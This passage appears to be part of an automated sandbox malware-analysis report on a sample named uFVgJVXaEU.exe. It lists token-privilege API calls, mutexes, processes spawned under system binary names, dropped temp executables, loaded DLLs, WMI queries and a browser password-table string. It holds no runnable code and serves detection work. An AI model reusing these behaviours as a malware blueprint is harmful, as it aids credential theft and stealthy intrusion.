              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA2EE0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,OpenProcess,CloseHandle,5_2_0DFA2EE0
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0008 AdjustTokenPrivileges,5_2_0DFD0008
              Source: C:\Windows\explorer.exeCode function: 5_2_0E102EE0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,OpenProcess,CloseHandle,5_2_0E102EE0
              Source: C:\Windows\explorer.exeCode function: 5_2_0E130008 AdjustTokenPrivileges,5_2_0E130008
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF42EE0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,OpenProcess,CloseHandle,5_2_0FF42EE0
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF70008 AdjustTokenPrivileges,5_2_0FF70008
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeCode function: 7_2_00007FF6C5DB40A4 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,7_2_00007FF6C5DB40A4
              Source: C:\Windows\System32\audiodg.exeCode function: 9_2_00007FF6EC8440A4 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,9_2_00007FF6EC8440A4
              Source: C:\Windows\System32\msiexec.exeCode function: 10_2_00007FF6345C40A4 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,10_2_00007FF6345C40A4
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C3DE4 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,wcscmp,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00007FF7E83C3DE4
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeFile created: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053Jump to behavior
              Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\worker_RdDwvE
              Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\rbNSpGEsyb
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeMutant created: NULL
              Source: C:\Windows\System32\audiodg.exeMutant created: \Sessions\1\BaseNamedObjects\worker_kBEqZh
              Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\worker_BAccdq
              Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\GqgWzd
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F72F.tmpJump to behavior
              Source: uFVgJVXaEU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
              Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002B48000.00000004.00000800.00020000.00000000.sdmp, F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: uFVgJVXaEU.exeReversingLabs: Detection: 57%
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeFile read: C:\Users\user\Desktop\uFVgJVXaEU.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\uFVgJVXaEU.exe "C:\Users\user\Desktop\uFVgJVXaEU.exe"
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe "C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe"
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe"
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe "C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe"
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe" Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe "C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe" Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe" Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe "C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: msvcp140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeSection loaded: libffi-7.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: uFVgJVXaEU.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: uFVgJVXaEU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1609827265.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1610543566.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605079743.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: 21AB.tmp.zx.exe, 0000000D.00000002.1632238467.00007FFBBB935000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605738557.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604778086.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607581691.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1609401461.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611370859.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 21AB.tmp.zx.exe, 0000000D.00000002.1632487423.00007FFBC3201000.00000002.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605348657.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607843222.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607058503.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1608628812.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604870009.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: vcruntime140.amd64.pdbGCTL source: 21AB.tmp.zx.exe, 0000000C.00000003.1603466307.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000002.1632632314.00007FFBC321E000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606094024.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.12.dr
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604568784.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604985991.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1608404585.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.12.dr
              Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606490661.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: 21AB.tmp.zx.exe, 0000000D.00000002.1632238467.00007FFBBB935000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: vcruntime140.amd64.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1603466307.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000002.1632632314.00007FFBC321E000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611718162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605261861.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
